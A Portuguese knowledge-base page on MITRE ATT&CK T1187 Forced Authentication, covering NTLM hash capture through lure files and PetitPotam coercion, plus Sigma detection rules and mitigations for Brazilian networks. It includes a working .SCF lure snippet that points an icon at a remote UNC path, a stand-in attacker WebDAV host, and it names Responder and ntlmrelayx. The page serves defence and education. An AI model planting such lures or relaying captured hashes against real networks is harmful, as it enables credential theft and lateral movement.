# T1187 - Forced Authentication > [!danger] Captura Passiva de Credenciais > A Forced Authentication é uma técnica elegante e de baixo risco operacional para o atacante: a vítima **voluntariamente** envia seu hash NTLM ao servidor controlado pelo adversário, simplesmente ao abrir um arquivo ou navegar em uma pasta. Não há execução de código malicioso - apenas o comportamento automático legítimo do Windows sendo explorado. ## Descrição Adversários podem coletar material de credenciais forçando ou induzindo um usuário a autenticar automaticamente contra um sistema sob seu controle - sem o conhecimento da vítima e sem necessidade de execução de código na máquina alvo. O mecanismo central desta técnica explora o comportamento padrão do protocolo **SMB (Server Message Block)** e do **WebDAV** no Windows: quando um sistema Windows tenta acessar um recurso de rede (arquivo, pasta, imagem, templaté), ele automaticamente envia as credenciais do usuário atual via autenticação NTLM ou Kerberos. Essa conveniência - projetada para que usuários corporativos não precisem redigitar senhas a cada acesso - torna-se um vetor de captura de hashes em ambientes mal configurados. O adversário posiciona um **arquivo-isca** (lure file) que referência um recurso em servidor externo sob seu controle. Quando a vítima interage com o arquivo (abre um documento, acessa uma pasta, visualiza um ícone), o Windows automaticamente tenta autenticar no servidor remoto, transmitindo o **hash NTLMv2** do usuário. Esse hash pode ser: 1. **Capturado e quebrado offline** (via [[t1110-brute-force|T1110 - Brute Force]]) para obter a senha em texto claro 2. **Retransmitido em tempo real** (NTLM Relay) para autenticar em outro sistema da rede - sem necessidade de quebrar o hash Os principais vetores de arquivo-isca incluem: - **Documentos Office** com recursos externos (imagens, templates, OLE objects) - **Arquivos .LNK** (atalhos do Windows) com ícones apontando para UNC paths remotos - **Arquivos .SCF** (Shell Command Files) com seção `[Shell]` referênciando servidor remoto - **Arquivos .URL** (Internet Shortcuts) com target em servidor SMB - **Páginas HTML** com tags `<img src="\\servidor\foto.jpg">` - **Requisições via MS-EFSRPC** (EfsRpcOpenFileRaw - "PetitPotam") A técnica é especialmente poderosa quando combinada com [[t1566-spearphishing-attachment|T1566.001 - Spearphishing Attachment]] ou [[t1221-template-injection|T1221 - Templaté Injection]] para entrega inicial do arquivo-isca. ## Como Funciona ### Vetor SMB com arquivo .SCF ou .LNK Arquivos `.SCF` são processados pelo Windows Explorer ao renderizar a pasta onde estão localizados - mesmo sem duplo clique. Um arquivo `.SCF` com conteúdo mínimo como: ``` [Shell] Command=2 IconFile=\\192.168.100.1\share\icon.ico [Taskbar] Command=ToggleDesktop ``` Força o Explorer a tentar buscar o ícone no servidor remoto, iniciando autenticação NTLM. O adversário com [[s0174-responder|Responder]] escutando na porta 445 captura o hash NTLMv2 imediatamente. ### Vetor WebDAV Quando SMB (porta 445) está bloqueado por firewall, o Windows faz fallback para **WebDAV** (HTTP/HTTPS portas 80/443). Um arquivo .LNK ou documento Office com referência a `http://servidor-atacante.com/recurso` ou via `\\servidor@80\recurso\` pode capturar credenciais mesmo em redes que restringem SMB de saída. ### Vetor MS-EFSRPC (PetitPotam) O vetor mais sofisticado e recente: usando a função `EfsRpcOpenFileRaw` do protocolo MS-EFSRPC (Encrypting File System Remote Protocol), um adversário pode **coagir um controlador de domínio** a autenticar contra um servidor arbitrário. Ao combinar isso com um NTLM Relay para o serviço ADCS (Active Directory Certificaté Services), o atacante pode obter um certificado de autenticação de máquina do DC e, a partir disso, comprometer o domínio inteiro - sem interação do usuário. ### Captura e Uso dos Hashes Com o servidor [[s0174-responder|Responder]] ou [[ntlmrelayx|ntlmrelayx]] (impacket), o adversário: - **Responder:** Captura hashes NTLMv2 para quebra offline com [[hashcat|Hashcat]] ou [[john-the-ripper|John the Ripper]] - **ntlmrelayx:** Retransmite a autenticação em tempo real para outro serviço (SMB, LDAP, ADCS, HTTP) - autenticando como a vítima sem precisar da senha ## Attack Flow ```mermaid graph TB A[Posicionamento do Arquivo-Isca<br/>SMB share / email / pasta pública] --> B{Vetor de Entrega} B -->|Spearphishing| C[Documento Office com Recurso Externo<br/>T1566.001 / Templaté Injection T1221] B -->|Acesso físico / share| D[Arquivo .SCF / .LNK na pasta da vítima<br/>Renderizado automaticamente pelo Explorer] B -->|Coerção de serviço| E[PetitPotam - EfsRpcOpenFileRaw<br/>Força autenticação do Domain Controller] C --> F[Vítima Abre Documento<br/>Windows tenta buscar recurso externo] D --> G[Explorer renderiza pasta<br/>Windows tenta buscar ícone remoto] E --> H[DC inicia autenticação NTLM<br/>Para servidor controlado pelo atacante] F --> I[Autenticação NTLM Automática<br/>Hash NTLMv2 transmitido para servidor remoto] G --> I H --> I I --> J{Estrategia do Atacante} J -->|Captura + Quebra Offline| K[Responder captura NTLMv2<br/>Hashcat quebra hash - T1110] J -->|Relay em Tempo Real| L[ntlmrelayx retransmite auth<br/>Autenticação em outro serviço da rede] K --> M[Senha em Texto Claro<br/>Acesso com credenciais válidas] L --> N[Acesso Lateral Imediato<br/>SMB / LDAP / ADCS sem a senha] M --> O[Movimento Lateral<br/>T1021 / T1078 - Valid Accounts] N --> O style A fill:#4ecdc4,color:#fff style I fill:#ffd93d,color:#333 style K fill:#ff6b6b,color:#fff style L fill:#ff6b6b,color:#fff style O fill:#ff6b6b,color:#fff ``` ## Exemplos de Uso ### DarkHydrus O grupo [[g0079-darkhydrus|DarkHydrus]], ativo no Oriente Médio e com foco em entidades governamentais, utiliza Forced Authentication como parte de campanhas de spearphishing altamente direcionadas. O grupo distribui documentos Office maliciosos com templates remotos via [[t1221-template-injection|Templaté Injection]] que, ao serem abertos, forçam autenticação SMB para servidores de coleta de hashes. Os hashes capturados são posteriormente quebrados e usados para acesso inicial ao ambiente da vítima. ### Dragonfly (Energetic Bear) [[g0035-dragonfly|Dragonfly]], grupo de origem russa com foco histórico em infraestrutura crítica e setor energético, utiliza arquivos .LNK e documentos com recursos externos em campanhas de watering hole e spearphishing contra operadores de sistemas industriais (ICS/SCADA). Em campanhas documentadas (Dragonfly 2.0), a forced authentication foi combinada com NTLM relay para comprometer sistemas OT/IT sem necessitar de exploit remoto. ### EnvyScout (APT29 / Cozy Bear) O malware [[s0634-envyscout|EnvyScout]], associado ao [[g0016-apt29|APT29]], utiliza arquivos HTML com recursos que forçam autenticação SMB como parte de suas campanhas de phishing - uma das implementações mais sofisticadas da técnica, com evasão de controles de email e proxies. ### Uso em Red Teams e Pentests no Brasil A técnica é amplamente utilizada em avaliações de Red Team no Brasil. A combinação de redes corporativas que permitem tráfego SMB interno irrestrito + ausência de bloqueio de SMB de saída + senhas fracas (suscetíveis à quebra offline) torna essa técnica particularmente efetiva em ambientes empresariais brasileiros. Em um cenário típico, um arquivo `.SCF` colocado em um compartilhamento de rede acessível por múltiplos usuários pode capturar dezenas de hashes em poucas horas. ## Detecção ### Indicadores de Comprometimento - Conexões SMB de saída (porta 445) ou WebDAV (portas 80/443) para endereços IP externos ou incomuns, especialmente a partir de workstations comuns - Arquivos `.SCF`, `.LNK` ou `.URL` em compartilhamentos de rede com destinos externos nos campos de ícone/target - Documentos Office com referências a recursos em servidores externos (`\\<IP>\`, `http://<IP>/`) - Tráfego NTLM de saída para endereços não pertencentes à organização - Eventos de autenticação NTLM para sistemas desconhecidos (Evento 4624 com logon type 3 de destinos externos) ### Regra Sigma - Arquivo SCF com UNC Path Externo ```yaml title: Arquivo SCF com Referência a Servidor Externo - Possível Forced Authentication Lure status: experimental description: | Detecta criação ou acesso a arquivos .SCF contendo referências a UNC paths externos, que podem ser usados para forçar autenticação NTLM de vítimas que navegam na pasta. Também cobre arquivos .LNK com ícone apontando para servidor remoto. logsource: product: windows category: file_event detection: selection_scf_creation: FileName|endswith: - '.scf' - '.url' filter_trusted_locations: TargetFilename|startswith: - 'C:\Windows\' - 'C:\Program Files\' condition: selection_scf_creation and not filter_trusted_locations level: medium tags: - attack.credential_access - attack.t1187 falsepositives: - Arquivos SCF/URL legítimos de aplicações - Links de intranet corporativa com UNC paths internos ``` ### Regra Sigma - Tráfego NTLM de Saída Anômalo ```yaml title: Autenticação NTLM de Saída para Servidor Externo status: experimental description: | Detecta tentativas de autenticação NTLM originadas de workstations em direção a servidores externos (fora da rede corporativa), indicativo de Forced Authentication via arquivo-isca com referência a servidor controlado pelo atacante. logsource: product: windows service: security detection: selection: EventID: 4624 LogonType: 3 AuthenticationPackageName: 'NTLM' filter_internal: IpAddress|cidr: - '10.0.0.0/8' - '172.16.0.0/12' - '192.168.0.0/16' condition: selection and not filter_internal level: high tags: - attack.credential_access - attack.t1187 ``` ### Monitoramento de Rede - Implementar regras de firewall bloqueando SMB (445/TCP) e NetBIOS (137-139/TCP/UDP) de saída para a internet - Monitorar logs de proxy para requisições WebDAV (`PROPFIND`, `OPTIONS`) a destinos externos - Inspecionar tráfego NTLM no períimetro com ferramentas de análise de protocolo (Zeek/Bro, Suricata com regras NTLM) ## Mitigação | ID | Mitigação | Descrição | |---|-----------|-----------| | M1027 | [[m1027-password-policies\|M1027 - Password Policies]] | Implementar senhas longas e complexas para dificultar a quebra offline de hashes NTLMv2 capturados. Considerar uso de passphrases (≥20 caracteres) para contas privilegiadas - hashes NTLMv2 de senhas muito longas são computacionalmente inviáveis de quebrar. | | M1037 | [[m1037-filter-network-traffic\|M1037 - Filter Network Traffic]] | Bloquear tráfego SMB (TCP 445, TCP/UDP 137-139) de saída no perímetro. Bloquear WebDAV de saída em clientes que não necessitam do protocolo. Implementar regras de firewall internas que previnam SMB de workstations para servidores externos. | ### Controles Adicionais - **Desabilitar NTLM onde possível:** Configurar via GPO `Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers = Deny All` em redes que suportam autenticação Kerberos exclusiva. Isso previne que qualquer autenticação NTLM sejá enviada para fora do domínio. - **Mitigação do PetitPotam (MS-EFSRPC):** Aplicar atualizações de segurança da Microsoft referentes ao PetitPotam (2021) e desabilitar o serviço EFS onde não necessário. Implementar Extended Protection for Authentication (EPA) no ADCS. - **SMB Signing obrigatório:** Habilitar assinatura SMB obrigatória em toda a rede previne ataques de NTLM Relay - mesmo que o hash sejá capturado, o relay é bloqueado. - **Network Level Authentication:** Em ambientes RDP, habilitar NLA previne captura de credenciais via ataques de downgrade. - **Credential Guard:** Para contas privilegiadas, o Windows Credential Guard impede que hashes NTLM sejam extraídos do processo LSASS, limitando o impacto mesmo se um arquivo-isca for aberto. ## Contexto Brasil/LATAM A Forced Authentication é uma técnica especialmente relevante no contexto brasileiro por múltiplos fatores estruturais: **Redes corporativas com SMB irrestrito:** A maioria das redes corporativas brasileiras - especialmente em PMEs e no setor público - não bloqueia tráfego SMB de saída para a internet. Isso significa que qualquer documento com referência a servidor externo pode capturar hashes de usuários corporativos com acesso à internet. **Setor industrial e energia:** O grupo [[g0035-dragonfly|Dragonfly]] e grupos alinhados ao estado russo têm histórico de operações contra infraestrutura crítica de países da América Latina, incluindo tentativas documentadas contra o setor energético brasileiro. A técnica de forced authentication via arquivos em sistemas OT/IT é de particular preocupação para operadores de infraestrutura crítica regulados pela [[aneel|ANEEL]] e [[anp|ANP]]. **Campanhas de phishing dirigidas:** A técnica de [[t1221-template-injection|Templaté Injection]] combinada com forced authentication é frequentemente observada em campanhas de phishing direcionadas ao setor financeiro brasileiro - onde o documento Office parece legítimo (sem macros) mas faz referência a templates remotos que capturam hashes. O [[cert-br|CERT.br]] registra incidentes consistentes com este padrão. **Comprometimento de supply chain:** Em incidentes recentes documentados no Brasil, atacantes colocaram arquivos `.SCF` em compartilhamentos de rede de fornecedores com acesso a redes de empresas-alvo maiores, explorando relações de confiança entre domínios para capturar credenciais de funcionários das empresas alvo sem jámais comprometer diretamente um sistema delas. **Baixa adoção de SMB Signing:** A configuração padrão do Windows Server não exige assinatura SMB, tornando ataques de NTLM Relay viáveis na maioria dos ambientes brasileiros. Em auditorias de segurança no Brasil, a ausência de SMB Signing obrigatório é uma das falhas mais comumente encontradas - abrindo caminho para relay de credenciais capturadas via forced authentication para comprometer servidores críticos. O [[cert-br|CERT.br]] e referências do [[framework-csa-brasil|CSA Brasil]] recomendam como controle prioritário o bloqueio de SMB de saída e a habilitação de SMB Signing obrigatório, especialmente em redes com dados sensíveis e acesso a sistemas críticos. ## Referências - [MITRE ATT&CK - T1187 Forced Authentication](https://attack.mitre.org/techniques/T1187) - [Responder - Laurent Gaffie](https://github.com/lgandx/Responder) - [impacket ntlmrelayx](https://github.com/fortra/impacket) - [PetitPotam - Análise Técnica (CERT-FR)](https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-013/) - [SMB Relay Attacks - Beau Bullock (DerbyCon)](https://www.blackhillsinfosec.com/by-author/beau-bullock/) - [Mitigating NTLM Relay Attacks - Microsoft](https://docs.microsoft.com/en-us/security/operations/prevent-ntlm-relay-attacks) - [EnvyScout Analysis - ESET Research](https://www.welivesecurity.com/) **Técnicas Relacionadas:** [[t1566-spearphishing-attachment|T1566.001 - Spearphishing Attachment]], [[t1221-template-injection|T1221 - Templaté Injection]], [[t1110-brute-force|T1110 - Brute Force]], [[t1550-pass-the-hash|T1550.002 - Pass the Hash]], [[t1078-valid-accounts|T1078 - Valid Accounts]] **Ferramentas / Malware:** [[s0634-envyscout|EnvyScout]], [[s0174-responder|Responder]], [[ntlmrelayx|ntlmrelayx]] --- *Fonte: [MITRE ATT&CK - T1187](https://attack.mitre.org/techniques/T1187)*